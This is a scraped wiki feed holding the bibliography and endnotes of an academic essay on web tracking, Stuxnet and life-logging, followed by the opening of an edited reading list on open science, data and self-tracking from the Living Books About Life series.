Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4702</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4702"/>
		<updated>2012-04-18T14:00:07Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4]&lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes] &lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media] &lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda&lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Drucker Video}} &lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
